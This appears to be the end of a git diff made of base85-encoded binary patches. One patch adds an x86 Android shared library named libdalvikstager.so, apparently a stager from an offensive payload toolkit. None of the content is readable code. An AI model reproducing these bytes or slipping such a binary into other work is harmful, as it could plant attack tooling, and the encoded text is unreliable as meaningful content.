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 z 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 G)4u@fN9;5J literal 0 HcmV?d00001 diff --git a/data/android/libs/x86/libdalvikstager.so b/data/android/libs/x86/libdalvikstager.so new file mode 100644 index 0000000000000000000000000000000000000000..e7a9f5e233ba153534221cf74548efe26a4583fd GIT binary patch literal 5220 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 